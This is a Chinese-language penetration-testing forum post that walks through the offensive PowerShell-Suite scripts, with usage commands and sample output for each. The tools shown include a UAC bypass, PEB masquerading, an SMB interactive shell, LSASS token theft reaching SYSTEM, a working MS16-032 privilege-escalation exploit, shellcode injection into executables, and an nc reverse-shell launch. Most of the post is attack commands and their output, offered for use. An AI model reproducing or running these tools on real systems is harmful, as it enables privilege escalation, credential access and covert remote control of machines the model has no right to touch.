Metasploit渗透测试论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

安络长矛深度安全检测系统
Metascan metasploit pro
查看: 2634|回复: 0

神级脚本大集合之PowerShell-Suite

[复制链接]

0

主题

0

好友

25

积分

正式会员

Rank: 2

发表于 2016-11-29 10:20:41 |显示全部楼层
本帖最后由 type 于 2016-11-29 10:36 编辑

PowerShell-Suite简介

PowerShell-Suite是b33f创建的一个GitHub项目,主要收集了目前神器级别的PowerShell攻击脚本。所以个人感觉很值得向大家详细介绍一下里面各个脚本的使用方法。


Windows API

这里主要介绍了调用了Windows API的PowerShell脚本。


Invoke-Runas

功能等同于Windows下的runas.exe,调用Advapi32::CreateProcessWithLogonW。

  1. Start cmd with a local account.
  2. C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1

  3. Start cmd with remote credentials. Equivalent to "/netonly" in runas.
  4. C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2
复制代码
Invoke-NetSessionEnum

调用Netapi32::NetSessionEnum去枚举域内计算机的活动会话。

  1. Enumerate active sessions on "SomeHostName".
  2. C:\PS> Invoke-NetSessionEnum -HostName SomeHostName
复制代码
Invoke-CreateProcess

调用Kernel32::CreateProcess实现对进程的精准控制。

  1. Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
  2. C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1

  3. Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
  4. C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
复制代码
Detect-Debug

使用多种技术来检查调试器是否存在。

  1. Sample below is x64 Win8, WinDbg attached to PowerShell.
  2. C:\PS> Detect-Debug

  3. [+] Detect Kernel-Mode Debugging
  4.     [?] SystemKernelDebuggerInformation: False

  5. [+] Detect User-Mode Debugging
  6.     [?] CloseHandle Exception: Detected
  7.     [?] IsDebuggerPresent: Detected
  8.     [?] CheckRemoteDebuggerPresent: Detected
  9.     [?] PEB!BeingDebugged: Detected
  10.     [?] PEB!NtGlobalFlag: Detected
  11.     [?] DebugSelf: Detected
复制代码
Get-Handles

调用NtQuerySystemInformation::SystemHandleInformation去获取指定进程的句柄列表。

  1. Get handles for PID 2288
  2. C:\PS> Get-Handles -ProcID 2288

  3. [>] PID 2288 --> notepad
  4. [+] Calling NtQuerySystemInformation::SystemHandleInformation
  5. [?] Success, allocated 449300 byte result buffer

  6. [>] Result buffer contains 28081 SystemHandleInformation objects
  7. [>] PID 2288 has 71 handle objects

  8. PID ObjectType      HandleFlags        Handle KernelPointer AccessMask
  9. --- ----------      -----------        ------ ------------- ----------
  10. 2288 Directory       NONE               0x0004 0x88E629F0    0x00000000
  11. 2288 File            NONE               0x0008 0x84560C98    0x00100000
  12. 2288 File            NONE               0x000C 0x846164F0    0x00100000
  13. 2288 Key             NONE               0x0010 0xA3067A80    0x00020000
  14. 2288 ALPC Port       NONE               0x0014 0x8480C810    0x001F0000
  15. 2288 Mutant          NONE               0x0018 0x8591FEB8    0x001F0000
  16. 2288 Key             NONE               0x001C 0x96719C48    0x00020000
  17. 2288 Event           NONE               0x0020 0x850C6838    0x001F0000
  18. ...Snip...
复制代码
Get-TokenPrivs

打开进程的句柄,并调用Advapi32 :: GetTokenInformation列出与进程相关联的特权。

  1. Get token privileges for PID 3836
  2. C:\PS> Get-TokenPrivs -ProcID 3836

  3. [?] PID 3836 --> calc
  4. [+] Process handle: 1428
  5. [+] Token handle: 1028
  6. [+] Token has 5 privileges:

  7. LUID Privilege
  8. ---- ---------
  9.   19 SeShutdownPrivilege
  10.   23 SeChangeNotifyPrivilege
  11.   25 SeUndockPrivilege
  12.   33 SeIncreaseWorkingSetPrivilege
  13.   34 SeTimeZonePrivilege
复制代码
Get-Exports

获取DLL导出并且可以选择 C++ wrapper输出,它会将DLL读入内存,然后解释它们。所以不管是x32还是x64的DLL都可以解释执行。

  1. PS C:\> Get-Exports -DllPath C:\Windows\System32\ubpm.dll

  2. [?] 32-bit Image!

  3. [>] Time Stamp: 07/15/2016 18:07:55
  4. [>] Function Count: 16
  5. [>] Named Functions: 16
  6. [>] Ordinal Base: 1
  7. [>] Function Array RVA: 0x2F578
  8. [>] Name Array RVA: 0x2F5B8
  9. [>] Ordinal Array RVA: 0x2F5F8

  10. Ordinal ImageRVA   FunctionName
  11. ------- --------   ------------
  12.       1 0x000242A0 UbpmAcquireJobBackgroundMode
  13.       2 0x00004750 UbpmApiBufferFree
  14.       3 0x00004E30 UbpmCloseTriggerConsumer
  15.       4 0x000135E0 UbpmInitialize
  16.       5 0x00008D00 UbpmOpenTriggerConsumer
  17.       6 0x000242C0 UbpmReleaseJobBackgroundMode
  18.       7 0x00013230 UbpmSessionStateChanged
  19.       8 0x000242E0 UbpmTerminate
  20.       9 0x00003BD0 UbpmTriggerConsumerConfigure
  21.      10 0x000040C0 UbpmTriggerConsumerControl
  22.      11 0x00025B10 UbpmTriggerConsumerControlNotifications
  23.      12 0x00025B40 UbpmTriggerConsumerQueryStatus
  24.      13 0x0000E1B0 UbpmTriggerConsumerRegister
  25.      14 0x000043F0 UbpmTriggerConsumerSetDisabledForUser
  26.      15 0x00012480 UbpmTriggerConsumerSetStatePublishingSecurity
  27.      16 0x00005330 UbpmTriggerConsumerUnregister
复制代码
pwnd
Bypass-UAC

Bypass-UAC提供了一个能够进行UAC绕过的框架,该框架可以通过调用IFileOperation COM对象所提供的方法来实现自动提权。这其实并不是一种新的技术了,在此之前,我们可以通过向“explorer.exe”进程注入DLL来实现UAC绕过。但是这种方式并不是最有效的,因为向explorer注入DLL很有可能会触发系统的安全警报。不仅如此,利用这种固定的、无法控制的DLL来实现UAC绕过,将会极大地降低操作的灵活性。

  1. C:\PS> Bypass-UAC -Method ucmDismMethod

  2. [!] Impersonating explorer.exe!
  3. [+] PebBaseAddress: 0x000007F73E93F000
  4. [!] RtlEnterCriticalSection --> &Peb->FastPebLock
  5. [>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x000000569B5F1780
  6. [>] Overwriting &Peb->ProcessParameters.CommandLine: 0x000000569B5F1790
  7. [?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
  8. [>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x000000569B5F2208
  9. [>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x000000569B5F2218
  10. [!] RtlLeaveCriticalSection --> &Peb->FastPebLock

  11. [>] Dropping proxy dll..
  12. [+] 64-bit Yamabiko: C:\Users\b33f\AppData\Local\Temp\yam1730961377.tmp
  13. [>] Creating XML trigger: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
  14. [>] Performing elevated IFileOperation::MoveItem operation..

  15. [?] Executing PkgMgr..
  16. [!] UAC artifact: C:\Windows\System32\dismcore.dll
  17. [!] UAC artifact: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
复制代码
Masquerade-PEB

它可以使用PSReflect组件。这个函数可以重写PowerShell的PEB结构,从而实现伪装“explorer.exe”的目的。

  1. C:\PS> Masquerade-PEB -BinPath C:\Windows\System32\notepad.exe

  2. [?] PID 2756
  3. [+] PebBaseAddress: 0x7FFD3000
  4. [!] RtlEnterCriticalSection --> &Peb->FastPebLock
  5. [>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x002F11F8
  6. [>] Overwriting &Peb->ProcessParameters.CommandLine: 0x002F1200
  7. [?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
  8. [>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x002F1B74
  9. [>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x002F1B7C
  10. [!] RtlLeaveCriticalSection --> &Peb->FastPebLock
复制代码
Invoke-SMBShell

这是一个基于SMB通信协议的交互式Shell。

Server:

  1. PS C:\> Invoke-SMBShell

  2. +-------
  3. | Host Name: 0AK
  4. | Named Pipe: tapsrv.5604.yk0DxXvjUD9xwyJ9
  5. | AES Key: q6EKfuJTX93YUnmX
  6. +-------

  7. [>] Waiting for client..


  8. SMB shell: whoami
  9. 0ak\b33f

  10. SMB shell: IdontExist
  11. The term 'IdontExist' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

  12. SMB shell: $PSVersionTable
  13. Name                           Value
  14. ----                           -----
  15. PSRemotingProtocolVersion      2.2
  16. BuildVersion                   6.2.9200.17065
  17. PSCompatibleVersions           {1.0, 2.0, 3.0}
  18. PSVersion                      3.0
  19. CLRVersion                     4.0.30319.42000
  20. WSManStackVersion              3.0
  21. SerializationVersion           1.1.0.1

  22. SMB shell: leave

  23. [!] Client disconnecting..

  24. [>] Waiting for client..


  25. SMB shell: calc
  26. Job SMBJob-dVkIkAkXINjMe09S completed successfully!

  27. SMB shell: exit

  28. [!] Client disconnecting..
  29. [!] Terminating server..

  30. PS C:\>
复制代码

Client:

  1. # Client disconnected because of "leave" command
  2. PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
  3. # Client disconnected because "exit" command kills client/server
  4. PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
复制代码
Conjure-LSASS

使用SeDebugPrivilege复制LSASS访问令牌,然后冒用它调用线程。如果SeDebugPrivilege被禁用,我们可以重新启用它。

  1. Conjure LSASS into our midst! ;)

  2. C:\PS> Conjure-LSASS

  3. [?] SeDebugPrivilege is available!

  4. [+] Current process handle: 852

  5. [>] Calling Advapi32::OpenProcessToken
  6. [+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: 2000

  7. [?] SeDebugPrivilege is enabled!

  8. [>] Calling Advapi32::OpenProcessToken --> LSASS
  9. [+] Token handle with TOKEN_IMPERSONATE|TOKEN_DUPLICATE: 1512

  10. [>] Calling Advapi32::DuplicateToken --> LSASS
  11. [+] Duplicate token handle with SecurityImpersonation level: 2008

  12. [>] Calling Advapi32::SetThreadToken
  13. [+] Knock knock .. who's there .. LSASS
  14. [+] User context: SYSTEM

  15. C:\PS> whoami
  16. ERROR: Access is denied.
  17. ERROR: Access is denied.

  18. C:\PS> Get-ChildItem -Path hklm:SAM

  19.     Hive: HKEY_LOCAL_MACHINE\SAM


  20. SKC  VC Name                           Property
  21. ---  -- ----                           --------
  22.   3   2 SAM                            {C, ServerDomainUpdates}
复制代码
Invoke-MS16-032

这是使用powershell实现的MS16-032的漏洞利用脚本,MS16-032是Windows提权漏洞,大家都懂得啊,不解释了。

目标:

Win7-Win10 & 2k8-2k12 <== 32/64 bit!

Tested on x32 Win7, x64 Win8, x64 2k12R2

  1. Sit back and watch the pwn!
  2. C:\PS> Invoke-MS16-032
  3.          __ __ ___ ___   ___     ___ ___ ___
  4.         |  V  |  _|_  | |  _|___|   |_  |_  |
  5.         |     |_  |_| |_| . |___| | |_  |  _|
  6.         |_|_|_|___|_____|___|   |___|___|___|

  7.                        [by b33f -> @FuzzySec]

  8. [?] Operating system core count: 2
  9. [>] Duplicating CreateProcessWithLogonW handle
  10. [?] Done, using thread handle: 956

  11. [*] Sniffing out privileged impersonation token..

  12. [?] Thread belongs to: svchost
  13. [+] Thread suspended
  14. [>] Wiping current impersonation token
  15. [>] Building SYSTEM impersonation token
  16. [?] Success, open SYSTEM token handle: 964
  17. [+] Resuming thread..

  18. [*] Sniffing out SYSTEM shell..

  19. [>] Duplicating SYSTEM token
  20. [>] Starting token race
  21. [>] Starting process race
  22. [!] Holy handle leak Batman, we have a SYSTEM shell!!
复制代码
Subvert-PE

将shellcode注入到PE映像中。

  1. Analyse the PE header and hexdump the region of memory where shellcode would be injected.
  2. C:\PS> Subvert-PE -Path C:\Path\To\PE.exe

  3. Same as above but continue to inject shellcode and overwrite the binary.
  4. C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
复制代码
Utility
Trace-Execution

使用Capstone引擎从其入口点递归地拆解PE(x32 / x64),由于反汇编是静态的,x32 / x64 PE都可以反汇编,不管PowerShell的位数。

  1. PS C:\> Trace-Execution -Path .\Desktop\some.exe -InstructionCount 10

  2. [>] 32-bit Image!

  3. [?] Call table:

  4. Address    Mnemonic Taken Reason
  5. -------    -------- ----- ------
  6. 0x4AD0829A call     Yes   Relative offset call
  7. 0x4AD07CB7 call     No    Indirect call

  8. [?] Instruction trace:

  9. Size Address    Mnemonic Operands                    Bytes                   RegRead  RegWrite
  10. ---- -------    -------- --------                    -----                   -------  --------
  11.    5 0x4AD0829A call     0x4ad07c89                  {232, 234, 249, 255...} {esp}
  12.    2 0x4AD07C89 mov      edi, edi                    {139, 255, 249, 255...}
  13.    1 0x4AD07C8B push     ebp                         {85, 255, 249, 255...}  {esp}    {esp}
  14.    2 0x4AD07C8C mov      ebp, esp                    {139, 236, 249, 255...}
  15.    3 0x4AD07C8E sub      esp, 0x10                   {131, 236, 16, 255...}           {eflags}
  16.    5 0x4AD07C91 mov      eax, dword ptr [0x4ad240ac] {161, 172, 64, 210...}
  17.    4 0x4AD07C96 and      dword ptr [ebp - 8], 0      {131, 101, 248, 0...}            {eflags}
  18.    4 0x4AD07C9A and      dword ptr [ebp - 4], 0      {131, 101, 252, 0...}            {eflags}
  19.    1 0x4AD07C9E push     ebx                         {83, 101, 252, 0...}    {esp}    {esp}
  20.    1 0x4AD07C9F push     edi                         {87, 101, 252, 0...}    {esp}    {esp}
  21.    5 0x4AD07CA0 mov      edi, 0xbb40e64e             {191, 78, 230, 64...}
  22.    5 0x4AD07CA5 mov      ebx, 0xffff0000             {187, 0, 0, 255...}
  23.    2 0x4AD07CAA cmp      eax, edi                    {59, 199, 0, 255...}             {eflags}
  24.    6 0x4AD07CAC jne      0x4ad1bc8c                  {15, 133, 218, 63...}   {eflags}
  25.    1 0x4AD07CB2 push     esi                         {86, 133, 218, 63...}   {esp}    {esp}
  26.    3 0x4AD07CB3 lea      eax, dword ptr [ebp - 8]    {141, 69, 248, 63...}
  27.    1 0x4AD07CB6 push     eax                         {80, 69, 248, 63...}    {esp}    {esp}
  28.    6 0x4AD07CB7 call     dword ptr [0x4ad01150]      {255, 21, 80, 17...}    {esp}
  29.    3 0x4AD07CBD mov      esi, dword ptr [ebp - 4]    {139, 117, 252, 0...}
  30.    3 0x4AD07CC0 xor      esi, dword ptr [ebp - 8]    {51, 117, 248, 0...}             {eflags}
复制代码

项目地址:https://github.com/FuzzySecurity/PowerShell-Suite



如文中未特别声明转载请注明出自:http://www.metasploit.cn/
*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

QQ|Archiver|手机版|Metasploit ( 粤ICP备15008156号-1 )

GMT+8, 2017-7-21 12:57 , Processed in 0.330560 second(s), 28 queries .

Powered by Discuz! X2.5

© 2001-2012 Comsenz Inc.

回顶部